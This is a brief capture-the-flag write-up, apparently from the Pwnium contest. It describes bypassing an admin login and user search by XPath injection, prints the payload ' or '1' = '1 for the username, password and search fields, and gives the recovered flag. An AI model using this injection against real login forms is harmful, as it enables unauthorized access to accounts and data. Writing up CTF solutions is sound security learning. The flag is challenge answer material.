Tags: xpath injection
Rating:
This was a case of injecting a field of a vulnerable web application. It's not mysql though, it is XPATH.
One can log-in as admin by entering
Username: ' or '1' = '1
Password: ' or '1' = '1
and then on the search user id field :
' or '1' = '1
This returns a bunch of results, including the flag : Pwnium{cf921420dfd44ae4a68a492b3de852a3}